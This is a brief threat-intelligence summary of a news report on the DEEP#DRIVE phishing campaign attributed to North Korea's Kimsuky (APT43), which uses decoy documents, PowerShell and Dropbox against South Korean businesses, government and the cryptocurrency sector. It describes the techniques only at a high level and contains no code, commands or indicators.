Summary: A North Korean-affiliated nation-state threat actor, linked to the hacking group Kimsuky, is conducting a sophisticated cyber campaign dubbed DEEP#DRIVE, primarily targeting South Korean businesses, government entities, and the cryptocurrency sector. The attackers utilize tailored phishing lures disguised as legitimate documents to infiltrate systems and employ various PowerShell scripts for payload delivery and data exfiltration. This ongoing campaign highlights the attackers’ advanced techniques, including dynamic infrastructure and cloud-based methods to bypass detection.
Affected: South Korean businesses, government, and cryptocurrency sectors
Keypoints :
- Attack attributed to Kimsuky, also known by several aliases including APT43 and Velvet Chollima.
- Phishing emails contain decoy documents in formats like .HWP, .XLSX, and .PPTX aimed at deceiving recipients.
- Utilizes PowerShell scripts and Dropbox for payload delivery and data exfiltration, enhancing stealth and evasion tactics.
- Campaign may have been active since September last year, demonstrating long-term operational security monitoring by the attackers.
- The use of OAuth tokens facilitates seamless retrieval of reconnaissance data, complicating incident response efforts.
Source: https://thehackernews.com/2025/02/north-korean-apt43-uses-powershell-and.html